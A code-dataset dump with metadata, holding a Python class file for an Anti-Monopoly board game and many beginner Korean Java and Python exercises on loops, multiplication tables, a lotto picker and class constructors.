"blob_id": "f5d39612c74cffea44607a083f1e605803d69e1f", "content_id": "affcea19eb6be970692970a7dc0ecbed8bcf29dc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5917, "license_type": "permissive", "max_line_length": 82, "num_lines": 198, "path": "/classes/square.py", "repo_name": "stonek4/anti-monopoly", "src_encoding": "UTF-8", "text": "from functions import roll\n\nclass SQUARE:\n def get_name(self):\n return self.name\n def get_style(self):\n return self.style\n def __init__(self, name, style):\n self.style = style\n self.name = name\n\nclass GOTO(SQUARE):\n def get_value(self,player):\n if(player == \"m\"):\n return [\"straight\",\"sightseeing tour\"]\n if(player == \"c\"):\n return [\"move\",\"sightseeing tour\"]\n def __init__(self,name):\n SQUARE.__init__(self,name,\"go to\")\n\nclass PROPERTY_TAX(SQUARE):\n def get_value(self):\n return 75\n def __init__(self, name):\n SQUARE.__init__(self, name, \"property tax\")\n\nclass INCOME_TAX(SQUARE):\n def get_value(self, amount):\n if (amount < 200):\n return amount\n else:\n return 200\n def __init__(self, name):\n SQUARE.__init__(self, name, \"income tax\")\n\nclass AMF(SQUARE):\n def get_value(self, player):\n if(player == \"m\"):\n return [\"pay\",160]\n elif(player == \"c\"):\n number = roll(1)\n if (number == 1):\n return [\"collect\",25]\n elif (number == 2):\n return [\"collect\",50]\n else:\n return [\"collect\",0]\n def __init__(self,name):\n SQUARE.__init__(self,name,\"anti-monopoly foundation\")\n\nclass PROPERTY(SQUARE):\n def get_cost(self):\n return self.cost\n def get_city(self):\n return self.city\n def get_m_val(self):\n return self.v_mort\n def get_um_val(self):\n return self.v_umort\n def get_h_val(self):\n return self.c_house\n def get_houses(self):\n return self.houses\n def add_house(self):\n self.houses += 1\n return True\n def rem_house(self):\n self.houses -= 1\n def mortgage(self):\n self.is_mortgaged = True\n return True\n def un_mortgage(self):\n self.is_mortgaged = False\n return True\n def check_mortgage(self):\n return self.is_mortgaged\n def get_value(self, owner, number):\n if(owner == \"m\" and number > 1):\n return (self.m_rent*2) + (self.m_rise*self.houses)\n else:\n return self.c_rent + (self.c_rise*self.houses)\n def __init__(self, name, city, cost, c_house, c_rent, m_rent, c_rise, m_rise):\n SQUARE.__init__(self, name, \"property\")\n self.city = city\n self.cost = cost\n self.houses = 0\n self.v_mort = int(cost * .5)\n self.v_umort = int(cost * .55)\n self.c_house = c_house\n self.c_rent = c_rent\n self.m_rent = m_rent\n self.c_rise = c_rise\n self.m_rise = m_rise\n self.is_mortgaged = False\n\nclass CM(SQUARE):\n def get_value(self, player):\n number = roll(2)\n if(player == \"m\"):\n if(number == 2):\n return [\"move\",\"start\"]\n elif(number == 3):\n return [\"collect\",75]\n elif(number == 4):\n return [\"move\",\"beacon st.\"]\n elif(number == 5):\n return [\"pay\",75]\n elif(number == 6):\n return [\"move\",\"u.s. electric company\"]\n elif(number == 7):\n return [\"collect\",50]\n elif(number == 8):\n return [\"move\",\"u.s. air line\"]\n elif(number == 9):\n return [\"pay\",50]\n elif(number == 10):\n return [\"collect_c\",25]\n elif(number == 11):\n return [\"straight\",\"sightseeing tour\"]\n elif(number == 12):\n return [\"pay\",25]\n elif(player == \"c\"):\n if(number == 2):\n return [\"move\",\"u.s. air line\"]\n elif(number == 3):\n return [\"pay\",75]\n elif(number == 4):\n return [\"collect_m\",25]\n elif(number == 5):\n return [\"move\",\"u.s. electric company\"]\n elif(number == 6):\n return [\"pay\",25]\n elif(number == 7):\n return [\"move\",\"beacon st.\"]\n elif(number == 8):\n return [\"collect\",75]\n elif(number == 9):\n return [\"move\",\"start\"]\n elif(number == 10):\n return [\"pay\",50]\n elif(number == 11):\n return [\"collect\",50]\n elif(number == 12):\n return [\"move\",\"sightseeing tour\"]\n def __init__(self, name):\n SQUARE.__init__(self, name, \"cm\")\n\nclass UTILITY(SQUARE):\n def mortgage(self):\n self.is_mortgaged = True\n return True\n def un_mortgage(self):\n self.is_mortgaged = False\n return True\n def check_mortgage(self):\n return self.is_mortgaged\n def get_m_val(self):\n return 100\n def get_um_val(self):\n return 110\n def get_cost(self):\n return 150\n def get_value(self, owner, owned):\n number = roll(2)\n if(owned == 1):\n return (number * 4)\n elif(owned == 2):\n if(owner == \"c\"):\n return (number * 4)\n elif(owner == \"m\"):\n return (number * 10)\n def __init__(self, name):\n SQUARE.__init__(self, name, \"utility\")\n self.is_mortgaged = False\n\nclass TRANSPORT(SQUARE):\n def mortgage(self):\n self.is_mortgaged = True\n return True\n def un_mortgage(self):\n self.is_mortgaged = False\n return True\n def check_mortgage(self):\n return self.is_mortgaged\n def get_m_val(self):\n return 75\n def get_um_val(self):\n return 83\n def get_cost(self):\n return 200\n def get_value(self, owner, owned):\n if (owner == \"c\"):\n return 20\n elif (owner == \"m\"):\n return (40*(owned*2))\n def __init__(self, name):\n SQUARE.__init__(self,name,\"transport\")\n self.is_mortgaged = False\n" } ]
7
minu1212/kosa202110
https://github.com/minu1212/kosa202110
c9f872f7d188f3fa059d0bd58bbca282d9a6e3bb
79b55d9302d746bb70c41866a137701710e5a068
d3cbac3f54d6834de3d24233342896400660ba3c
refs/heads/main
2023-09-05T11:33:42.323177
2021-11-11T07:15:06
2021-11-11T07:15:06
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5027933120727539, "alphanum_fraction": 0.5335195660591125, "avg_line_length": 16.894737243652344, "blob_id": "5acf896203349fc3ec53ef6dfefb899a2b513c30", "content_id": "92dbffc952916b625e74c16e353f7ce6aad2ccf2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 378, "license_type": "no_license", "max_line_length": 35, "num_lines": 19, "path": "/lotto.py", "repo_name": "minu1212/kosa202110", "src_encoding": "UTF-8", "text": "import random\r\nicnt = int(input(\"구매수량을 입력하시오 : \"))\r\ny = 1\r\nwhile y <= icnt:\r\n\tlotto = []\r\n\ti = 1\r\n\twhile i <= 45:\r\n\t\tlotto.append(i)\r\n\t\ti += 1\r\n\tcnt = 1\r\n\tlottonum =\"\"\r\n\twhile cnt <= 6:\r\n\t\tlistSize = len(lotto) -1\r\n\t\tidx = random.randint(0, listSize)\r\n\t\tnum = lotto.pop(idx)\r\n\t\tlottonum += str(num) +\", \"\r\n\t\tcnt += 1\r\n\tprint(lottonum.rstrip(\", \"))\r\n\ty += 1;\t" }, { "alpha_fraction": 0.42954546213150024, "alphanum_fraction": 0.47045454382896423, "avg_line_length": 21.783782958984375, "blob_id": "452afc02aa1ff5476328cd1061e3e985ddda75e0", "content_id": "2fc4734d130d1f55af0d0d9c16057e5d485658a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 894, "license_type": "no_license", "max_line_length": 46, "num_lines": 37, "path": "/20211105/src/Ex16.java", "repo_name": "minu1212/kosa202110", "src_encoding": "UHC", "text": "\r\npublic class Ex16 {\r\n\r\n\tpublic static void main(String[] args) {\r\n\t\t// 1,3,5,7,9곱만 출력하시오.\r\n\t\tfor(int gop = 1; gop <= 9; gop+=2) {\r\n\t\t\tSystem.out.println(\"7 * \"+gop+\" = \"+7*gop);\r\n\t\t}\r\n\t\tSystem.out.println(\"=======\");\r\n\t\tfor(int gop = 1; gop <= 9; gop++) {\r\n\t\t\tif(gop % 2 == 0)continue;\r\n\t\t\tSystem.out.println(\"7 * \"+gop+\" = \"+7*gop);\r\n\t\t}\r\n\t\tSystem.out.println(\"=== while ===\");\r\n\t\tint gop = 0;\r\n\t\twhile (gop <= 9) {\r\n\t\t\tgop ++;\r\n\t\t\tif(gop % 2 == 0) continue;\r\n\t\t\tSystem.out.println(\"7 * \"+gop+\" = \"+7*gop);\r\n\t\t}\r\n\t\tSystem.out.println(\"======\");\r\n\t\tgop = 1;\r\n\t\twhile (true) {\r\n\t\t\tgop++;\r\n\t\t\tif(gop % 2 == 0)continue;\r\n\t\t\tif(gop > 9)break;\r\n\t\t\tSystem.out.println(\"7 * \"+gop+\" = \"+7*gop);\r\n\t\t}\r\n\t\tSystem.out.println(\"======\");\r\n\t\tgop = 1;\r\n\t\twhile (true) {\r\n\t\t\tgop++;\r\n\t\t\tif(gop % 2 == 0)continue;\r\n\t\t\tSystem.out.println(\"7 * \"+gop+\" = \"+7*gop);\r\n\t\t\tif(gop == 9)break;\r\n\t\t}\r\n\t}\r\n}" }, { "alpha_fraction": 0.529411792755127, "alphanum_fraction": 0.5501729846000671, "avg_line_length": 20.076923370361328, "blob_id": "068c2b8f5f6feba0e075dee28b9824c195c6a023", "content_id": "a78da3694089c1c2aef320bed83f01378caa54be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 393, "license_type": "no_license", "max_line_length": 37, "num_lines": 13, "path": "/20211109/src/Ex071.java", "repo_name": "minu1212/kosa202110", "src_encoding": "UHC", "text": "\r\npublic class Ex071 {\r\n\tint first;\r\n\t// 디펄트 생성자 : 생성자가 없으면 자동으로 만들지는 생성자.\r\n\t// 기본으로 존재하는 생성자\r\n\t// 암시적으로 존재한다.\r\n\t// public Ex071(){}가 암시적으로 존재.\r\n\tpublic void setFirst(int first) {\r\n\t\tthis.first = first;\r\n\t}\r\n\tpublic int getFirst() {\r\n\t\treturn this.first;\r\n\t}\r\n}\r\n" }, { "alpha_fraction": 0.36818182468414307, "alphanum_fraction": 0.4000000059604645, "avg_line_length": 18.1875, "blob_id": "5d753c659bcfba72d454ce28a1e4941bc02fa3d0", "content_id": "b161abb177431b89e3cf7149e4e22975bb107bbf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 678, "license_type": "no_license", "max_line_length": 52, "num_lines": 32, "path": "/20211105/src/Ex18.java", "repo_name": "minu1212/kosa202110", "src_encoding": "UHC", "text": "\r\npublic class Ex18 {\r\n\tpublic static void main(String[] args) {\r\n\t\t// 3단부터 7단까지 출력(while)\r\n\t\t// 3단\r\n\t\tint gop = 1;\r\n\t\twhile (gop <= 9) {\r\n\t\t\tSystem.out.println(\"3 * \" + gop + \" = \" + 3*gop);\r\n\t\t\tgop++;\r\n\t\t}\r\n\t\tgop = 1;\r\n\t\twhile (gop <= 9) {\r\n\t\t\tSystem.out.println(\"4 * \" + gop + \" = \" + 4*gop);\r\n\t\t\tgop++;\r\n\t\t}\r\n\t\tgop = 1;\r\n\t\twhile (gop <= 9) {\r\n\t\t\tSystem.out.println(\"5 * \" + gop + \" = \" + 5*gop);\r\n\t\t\tgop++;\r\n\t\t}\r\n\t\tSystem.out.println(\"=================\");\r\n\t\tint dan = 3;\r\n\t\twhile (dan <= 7) {\r\n\t\t\tgop = 1;\r\n\t\t\twhile (gop <= 9) {\r\n\t\t\t\tSystem.out.println(\r\n\t\t\t\t\t\tdan + \" * \" + gop + \" = \" + dan * gop);\r\n\t\t\t\tgop++;\r\n\t\t\t}\r\n\t\t\tdan++;\r\n\t\t}\r\n\t}\r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.3240963816642761, "alphanum_fraction": 0.39759036898612976, "avg_line_length": 16.81818199157715, "blob_id": "c0c0e9493fe4e77dd73f2b9091486c9582bb7e96", "content_id": "3dac2047b697e783fc78582d8ff7c33bf1b7cf98", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 830, "license_type": "no_license", "max_line_length": 49, "num_lines": 44, "path": "/20211105/src/Ex15.java", "repo_name": "minu1212/kosa202110", "src_encoding": "UTF-8", "text": "\r\npublic class Ex15 {\r\n\r\n\tpublic static void main(String[] args) {\r\n\t\tint sum = 0;\r\n\t\t\r\n\t\tfor (int i = 1; i <= 100 ; i++) {\r\n\t\t\tsum += i;\r\n\t\t}\r\n\t\tSystem.out.println(sum);\r\n\t\tSystem.out.println(\"=== while ===\");\r\n\t\tsum = 0;\r\n\t\tint i = 1;\r\n\t\twhile (i <= 100) {\r\n\t\t\tsum += i;\r\n\t\t\ti++;\r\n\t\t}\r\n\t\tSystem.out.println(sum);\r\n\t\t/* sum = 0\r\n\t\t * i = 1\r\n\t\t * while True:\r\n\t\t * \t\tsum += i\r\n\t\t * \t\tif i == 10 :\r\n\t\t * \t\t\tbreak \r\n\t\t * \t\ti += 1\r\n\t\t * print(sum)\r\n\t\t */\r\n\t\tsum = 0;\r\n\t\ti = 1;\r\n\t\twhile (true) {\r\n\t\t\tsum += i; // i = 1, 2, 3, 4, 5, 6, 7, 8, 9, 10\r\n\t\t\tif (i == 10) break;\r\n\t\t\ti ++;\r\n\t\t}\r\n\t\tSystem.out.println(sum);\r\n\t\tSystem.out.println(\"================\");\r\n\t\tsum = 0;\r\n\t\ti = 1;\r\n\t\twhile (true) {\r\n\t\t\tsum += i; // 1, 2, 3, 4,5,6,7,8,9, 10\r\n\t\t\ti ++; // 2, 3, 4, 5,6,7,8,9,10, 11\r\n\t\t\tif(i > 10)break; // if(i == 11) break;\r\n\t\t}\r\n\t}\r\n}\r\n" }, { "alpha_fraction": 0.5519534349441528, "alphanum_fraction": 0.5536159873008728, "avg_line_length": 24.19565200805664, "blob_id": "60b9706f40ce9fab4fac6debad3e078462931c41", "content_id": "a87c7dfece35e46ebc4a14f8e4d49416380ddfeb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1459, "license_type": "no_license", "max_line_length": 54, "num_lines": 46, "path": "/20211105/src/Ex23.java", "repo_name": "minu1212/kosa202110", "src_encoding": "UHC", "text": "import java.util.Scanner;\r\n\r\npublic class Ex23 {\r\n\r\n\tpublic static void main(String[] args) {\r\n\t\t// num = int(input(\"첫번째숫자를 입력해주세.\"))\r\n\t\t// Scanner\r\n\t\t/*\r\n\t\tScanner sc = new Scanner(System.in);\r\n\t\tSystem.out.print(\"이름을 입력하세요. : \");\r\n\t\tString name = sc.next();\r\n\t\tSystem.out.println(\"이름은 : \" + name);\r\n\t\tSystem.out.print(\"숫자를 입력해주세요. : \");\r\n\t\tint num = sc.nextInt();\r\n\t\tSystem.out.println(\"숫자 : \" + num);\r\n\t\t*/\r\n\t\t// 문제: 단과 곱의 범위를 입력 받아 구구단을 출력하시오.\r\n\t\tScanner sc = new Scanner(System.in);\r\n\t\twhile(true) { // 무조건 실행하기 위해서 true를 사용\r\n\t\t\tSystem.out.print(\"시작 단을 입력해 주세요. :\");\r\n\t\t\tint startDan = sc.nextInt();\r\n\t\t\tSystem.out.print(\"마지막 단을 입력해 주세요. :\");\r\n\t\t\tint endDan = sc.nextInt();\r\n\t\t\tSystem.out.print(\"시작 곱을 입력해 주세요. :\");\r\n\t\t\tint startGop = sc.nextInt();\r\n\t\t\tSystem.out.print(\"마지막 곱을 입력해 주세요. :\");\r\n\t\t\tint endGop = sc.nextInt();\r\n\t\t\t\r\n\t\t\tint dan = startDan;\r\n\t\t\twhile (dan <= endDan) {\r\n\t\t\t\tint gop = startGop;\r\n\t\t\t\twhile (gop <= endGop) {\r\n\t\t\t\t\tSystem.out.println(dan + \"*\" + gop +\"=\"+dan*gop);\r\n\t\t\t\t\tgop++;\r\n\t\t\t\t}\r\n\t\t\t\tdan++;\r\n\t\t\t}\r\n\t\t\tSystem.out.println(\"종료하려면 'y'아니면 아무키나. : \");\r\n\t\t\tString stop = sc.next();\r\n\t\t\tif(stop.equals(\"y\")) {\r\n\t\t\t\tSystem.out.println(\"프로그램 종료\");\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}" }, { "alpha_fraction": 0.2978723347187042, "alphanum_fraction": 0.35337650775909424, "avg_line_length": 23.0930233001709, "blob_id": "8193d0b1200db07707c7ecfb3e577eea41359802", "content_id": "f49babac1cf616a3ea7b3fcf72ca0b36edd3f605", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1107, "license_type": "no_license", "max_line_length": 56, "num_lines": 43, "path": "/20211105/src/Ex14.java", "repo_name": "minu1212/kosa202110", "src_encoding": "UHC", "text": "\r\npublic class Ex14 {\r\n\r\n\tpublic static void main(String[] args) {\r\n\t\t// i = 1 # 1\r\n\t\t// while i <= 9: # 2\r\n\t\t// \t\tprint(i) # 3\r\n\t\t// i += 1 # 4 => 10\r\n\t\t// 1 -> 2-> 3-> 4 -> 2 -> 3 -> 4->...-> 2\r\n\t\t// for문의 실행순서\r\n\t\t// 1 2 4\r\n\t\tfor(int i = 1 ; i <= 9; i++) {\r\n\t\t\t// 3\r\n\t\t\tSystem.out.println(\"5 * \" + i + \" = \" + 5 * i);\r\n\t\t}\r\n\t\t// 1 --> 2 --> 3 --> 4 --> 2 --> 3 --> 4 --> ... --> 2\r\n\t\tint i = 1;\r\n\t\tfor( ; i <= 9; ) {\r\n\t\t\tSystem.out.println(\"5 * \" + i + \" = \" + 5 * i);\r\n\t\t\ti++;\r\n\t\t}\r\n\t\tSystem.out.println(\"=== while ===\");\r\n\t\ti = 1; //1\r\n\t\twhile (i <= 9) { //2\r\n\t\t\tSystem.out.println(\"5 * \" + i + \" = \" + 5 * i); //3\r\n\t\t\ti++; //4\r\n\t\t}\r\n\t\t// while문으로 3단을 출력\r\n\t\tint gop = 1;\r\n\t\twhile (gop <= 9) {\r\n\t\t\tSystem.out.println(\" 3 * \" + gop + \" = \" + 3 * gop);\r\n\t\t}\r\n\t\tSystem.out.println(\"==========\");\r\n\t\tfor(gop = 3; gop <=7; gop++ ) {\r\n\t\t\tSystem.out.println(\" 3 * \" + gop + \" = \" + 3 * gop);\r\n\t\t}\r\n\t\tSystem.out.println(\"===== while =====\");\r\n\t\tgop = 3;\r\n\t\twhile (gop <= 7) {\r\n\t\t\tSystem.out.println(\" 3 * \" + gop + \" = \" + 3 * gop);\r\n\t\t\tgop ++;\r\n\t\t}\r\n\t}\r\n}\r\n" }, { "alpha_fraction": 0.5593952536582947, "alphanum_fraction": 0.5637149214744568, "avg_line_length": 27.0625, "blob_id": "d10714216467fd214511af8a6c26e194a52b8e04", "content_id": "1db62a19c07d6b1beaeb24ef11daa834c57129b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 625, "license_type": "no_license", "max_line_length": 57, "num_lines": 16, "path": "/gugudan.py", "repo_name": "minu1212/kosa202110", "src_encoding": "UTF-8", "text": "while True:\r\n\tstartDan = int(input(\"시작단을 입력해주세요. : \"))\r\n\tendDan = int(input(\"마지막단을 입력해주세요. : \"))\r\n\tstartGop = int(input(\"시작곱을 입력해주세요. : \"))\r\n\tendGop = int(input(\"마지막곱을 입력해주세요. : \"))\r\n\tdan = startDan\r\n\twhile dan <= endDan:\r\n\t\tgop = startGop\r\n\t\twhile gop <= endGop:\r\n\t\t\tprint(f\"{dan} * {gop} = {dan * gop}\")\r\n\t\t\tgop += 1\r\n\t\tdan += 1\r\n\tstop = input(\"프로그램을 종료 하시려면 'Y'또는 'y'를 누르고 계소하려면 아무키나 \")\r\n\tif stop == 'Y' or stop == 'y':\r\n\t\tprint(\"구구단 프로그램을 종료합니다.\")\r\n\t\tbreak" }, { "alpha_fraction": 0.5856950283050537, "alphanum_fraction": 0.593792200088501, "avg_line_length": 16.94871711730957, "blob_id": "9a350c3ccd5fa021d36f072ccb1afedc9cce306c", "content_id": "8a407dc108e5362da375efbcfcf17ad5a7e0b7fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 883, "license_type": "no_license", "max_line_length": 52, "num_lines": 39, "path": "/20211109/src/Ex061.java", "repo_name": "minu1212/kosa202110", "src_encoding": "UHC", "text": "\r\npublic class Ex061 {\r\n\tString name;\r\n\tint age;\r\n\tdouble height;\r\n\t/// 자바에서 생성자는 클래스명과 같아야 한다.\r\n\t// 생성자\r\n// 접근지정자 클래스명(매개변수,...)\r\n\tpublic Ex061(String name, int age, double height) {\r\n\t\tthis.name = name;\r\n\t\tthis.age = age;\r\n\t\tthis.height = height;\r\n\t\tSystem.out.println(\"생성자 실행\");\r\n\t}\r\n\t// 메서드 : \r\n// 접근지정자 반환형 함수명 (매개변수)\r\n\t// setter\r\n\t //반환형(void:반환할게 없다)\r\n\tpublic void setAge(int age) {\r\n\t\tthis.age = age;\r\n\t}\r\n\t\r\n\tpublic void setName(String name) {\r\n\t\tthis.name = name;\r\n\t}\r\n\tpublic void setHeight(double height) {\r\n\t\tthis.height = height;\r\n\t}\r\n\t// getter\r\n\tpublic int getAge() {\r\n\t\t// 정수를 반환\r\n\t\treturn this.age;\r\n\t}\r\n\tpublic double getHeight() {\r\n\t\treturn this.height;\r\n\t}\r\n\tpublic String getName() {\r\n\t\treturn this.name;\r\n\t}\r\n}\r\n" }, { "alpha_fraction": 0.6206896305084229, "alphanum_fraction": 0.634482741355896, "avg_line_length": 18.428571701049805, "blob_id": "1e68791757aabc6055d0ef0ff5d1f70f14cc36ca", "content_id": "04c9bb3894b426e96157ccfc81e9bf9334805b49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 169, "license_type": "no_license", "max_line_length": 40, "num_lines": 7, "path": "/20211109/src/Ex02.java", "repo_name": "minu1212/kosa202110", "src_encoding": "UHC", "text": "\r\npublic class Ex02 { // class자체가 자료형이 됨\r\n\tint age;\r\n\tdouble height;\r\n\tString name;\r\n\tString addr;\r\n\tboolean gender; // true : 여자, false :남자\r\n}\r\n" }, { "alpha_fraction": 0.54666668176651, "alphanum_fraction": 0.5666666626930237, "avg_line_length": 15.529411315917969, "blob_id": "60577077640017657edb70487b736b368b41ea04", "content_id": "31d50c1edf9e3f2eb97be35173669bdb87385ef1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 342, "license_type": "no_license", "max_line_length": 44, "num_lines": 17, "path": "/20211110/src/Ex03.java", "repo_name": "minu1212/kosa202110", "src_encoding": "UHC", "text": "\r\npublic class Ex03 {\r\n\tint first;\r\n\tint second;\r\n\tstatic int val;\r\n\tint val1;\r\n \r\n\tpublic int add(/* Ex03 this */) { // 멤버 메서드\r\n\t\treturn val + this.first;\r\n\t}\r\n\tpublic static int sub() { // static 메서드\r\n\t\t// return val - val1; \r\n\t\t// static 메서드에서는 instance를 사용할 수 없다.\r\n\t\treturn val ;\r\n\t\t\r\n\t}\r\n\t\r\n}\r\n" }, { "alpha_fraction": 0.6090909242630005, "alphanum_fraction": 0.6168830990791321, "avg_line_length": 18.210525512695312, "blob_id": "8319b54fd2c2909a14cb8a68d0f8db28eb496397", "content_id": "11d3def93d606ef5055b96d13505ddfbfdbd4559", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 912, "license_type": "no_license", "max_line_length": 42, "num_lines": 38, "path": "/20211109/src/Ex07.java", "repo_name": "minu1212/kosa202110", "src_encoding": "UHC", "text": "\r\npublic class Ex07 {\r\n\tint first;\r\n\tint second;\r\n\tint result;\r\n\t// 디펄트 생성자.\r\n\t// 개발자가 생성자를 만들면 디펄트 생성자는 자동으로 만들어지지 않는다.\r\n\t// 생성자가 있는 경우 디펄트 생성자는 명시적으로 만들어 줘야 한다.\r\n\tpublic Ex07() {\r\n\t\tSystem.out.println(\"디펄트 생성자 실행\");\r\n\t} \r\n\tpublic Ex07(int first, int second) {\r\n\t\tthis.first = first;\r\n\t\tthis.second = second;\r\n\t}\r\n\t// setter\r\n\tpublic void setFirst(int first) {\r\n\t\tthis.first = first;\r\n\t}\r\n\tpublic void setSecond(int second) {\r\n\t\tthis.second = second;\r\n\t}\r\n\t// getter\r\n\tpublic int getFirst() {\r\n\t\treturn this.first;\r\n\t}\r\n\tpublic int getSecond() {\r\n\t\treturn this.second;\r\n\t}\r\n\tpublic int getResult() {\r\n\t\treturn this.result;\r\n\t}\r\n\tpublic void add() {\r\n\t\tthis.result = this.first + this.second;\r\n\t}\r\n\tpublic void sub() {\r\n\t\tthis.result = this.first - this.second;\r\n\t}\r\n}\r\n" }, { "alpha_fraction": 0.4429175555706024, "alphanum_fraction": 0.48731499910354614, "avg_line_length": 22.842105865478516, "blob_id": "2af73807d5bff9c48ea1c31cde29125752fd84f3", "content_id": "b42c3ea9beb0767a63043b3eae1f8861aa29cc30", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1014, "license_type": "no_license", "max_line_length": 47, "num_lines": 38, "path": "/20211109/src/Ex13Test.java", "repo_name": "minu1212/kosa202110", "src_encoding": "UHC", "text": "\r\npublic class Ex13Test {\r\n\tpublic static void main(String [] args) {\r\n\t\t/*\r\n\t\t// 6단 출력\r\n\t\tfor(int i = 1 ; i <= 9; i++) {\r\n\t\t\tSystem.out.println(\"6 * \" + i + \" = \" +6*i);\r\n\t\t}\r\n\t\t// 8단 출력\r\n\t\tfor(int i = 1 ; i <= 9; i++) {\r\n\t\t\tSystem.out.println(\"8 * \" + i + \" = \" +8*i);\r\n\t\t}\r\n\t\t// 3단 출력\r\n\t\tfor(int i = 1 ; i <= 9; i++) {\r\n\t\t\tSystem.out.println(\"3 * \" + i + \" = \" +3*i);\r\n\t\t}\r\n\t\t*/\r\n\t\tgugu(3); // argument : 인자\r\n\t\tgugu(6);\r\n\t\tgugu(7);\r\n\t\tint result = 10 + 3;\r\n\t\tSystem.out.println(result);\r\n\t\tresult = 30 + 6;\r\n\t\tSystem.out.println(result);\r\n\t\tresult = add(20 , 10);\r\n\t\tSystem.out.println(result);\r\n\t\tint result1 = add(30, 10);\r\n\t\tSystem.out.println(result1);\r\n\t} // 반복적으로 사용하는 코드가 있는 경우 함수로\r\n\t// dan : parameter : 매개변수\r\n\tpublic static void gugu(int dan) { \r\n\t\tfor(int i = 1 ; i <= 9; i++) {\r\n\t\t\tSystem.out.println(dan+\" * \"+i+\" = \"+dan*i);\r\n\t\t}\r\n\t}\r\n\tpublic static int add(int num1, int num2) {\r\n\t\treturn num1 + num2;\r\n\t}\r\n}\r\n" }, { "alpha_fraction": 0.4745098054409027, "alphanum_fraction": 0.5137255191802979, "avg_line_length": 21.090909957885742, "blob_id": "4f0a9fe5309675ca81ae5e1eaedce6a377660ad8", "content_id": "fad3202c5a9ad760271972377377076fa9d1f43a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 546, "license_type": "no_license", "max_line_length": 51, "num_lines": 22, "path": "/20211104/src/Ex14.java", "repo_name": "minu1212/kosa202110", "src_encoding": "UHC", "text": "\r\npublic class Ex14 {\r\n\r\n\tpublic static void main(String[] args) {\r\n\t\t// num = random.randint(1, 6) \r\n\t\tint num = (int)(Math.random() * 6 ) + 1; // 1 ~ 6\r\n\t\tif (num == 1) {\r\n\t\t\tSystem.out.println(\"1입니다.\");\r\n\t\t}else if(num == 2) {\r\n\t\t\tSystem.out.println(\"2입니다.\");\r\n\t\t}else if(num == 3) {\r\n\t\t\tSystem.out.println(\"3입니다.\");\r\n\t\t}else if(num == 4) {\r\n\t\t\tSystem.out.println(\"4입니다.\");\r\n\t\t}else if(num == 5) {\r\n\t\t\tSystem.out.println(\"5입니다.\");\r\n\t\t}else if(num == 6) {\r\n\t\t\tSystem.out.println(\"6입니다.\");\r\n\t\t}\r\n\t\t\r\n\t}\r\n\r\n}\r\n" }, { "alpha_fraction": 0.605042040348053, "alphanum_fraction": 0.6162465214729309, "avg_line_length": 16.6842098236084, "blob_id": "9b0d7130f18e4dbf6382fd5b4081f59f561ea9bc", "content_id": "2071c679e2b63e767dd2ad768b0fa67f4f78e737", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 363, "license_type": "no_license", "max_line_length": 36, "num_lines": 19, "path": "/20211109/src/Ex12.java", "repo_name": "minu1212/kosa202110", "src_encoding": "WINDOWS-1252", "text": "\r\npublic class Ex12 {\r\n\tint first;\r\n\tint second;\r\n\tpublic void setFirst(int first) {\r\n\t\tthis.first = first;\r\n\t}\r\n\tpublic void setSecond(int second) {\r\n\t\tthis.second = second;\r\n\t}\r\n\tpublic int add() {\r\n\t\treturn this.first + this.second;\r\n\t}\r\n\tpublic int sub() {\r\n\t\treturn this.first - this.second;\r\n\t}\r\n\tpublic String getName() {\r\n\t\treturn \"À̼þ¹«\";\r\n\t}\r\n}\r\n" }, { "alpha_fraction": 0.5828343033790588, "alphanum_fraction": 0.6147704720497131, "avg_line_length": 19.782608032226562, "blob_id": "3eb160a3ac5355bd2f370da5fe018bb38bc97e5c", "content_id": "cc34303ef551f25c08b37697cbc571a2cb4b4915", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 509, "license_type": "no_license", "max_line_length": 42, "num_lines": 23, "path": "/20211109/src/Car2.java", "repo_name": "minu1212/kosa202110", "src_encoding": "WINDOWS-1252", "text": "\r\npublic class Car2 {\r\n\tString model;\r\n\tString color;\r\n\tint maxSpeed;\r\n\tpublic Car2(String model) {\r\n\t\tthis(model,\"Èò»ö\", 250 );\r\n\t\t/*this.model = model;\r\n\t\tthis.color = \"Èò»ö\";\r\n\t\tthis.maxSpeed = 250;*/\r\n\t}\r\n\tpublic Car2(String model,String color ) {\r\n\t\tthis(model,color, 230 );\r\n\t\t/*this.model = model;\r\n\t\tthis.color = color;\r\n\t\tthis.maxSpeed = 230;*/\r\n\t}\r\n\tpublic Car2(String model,String color ,\r\n\t\t\tint maxSpeed) {\r\n\t\tthis.model = model;\r\n\t\tthis.color = color;\r\n\t\tthis.maxSpeed = maxSpeed;\r\n\t}\r\n}" }, { "alpha_fraction": 0.3002958595752716, "alphanum_fraction": 0.357988178730011, "avg_line_length": 18.75, "blob_id": "5b09d3e106e5f44a40907d67569bb0631bba61e9", "content_id": "a502a13d72ed26480d4a425a26e0eaeb157ea0fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 708, "license_type": "no_license", "max_line_length": 45, "num_lines": 32, "path": "/20211105/src/Ex19.java", "repo_name": "minu1212/kosa202110", "src_encoding": "UHC", 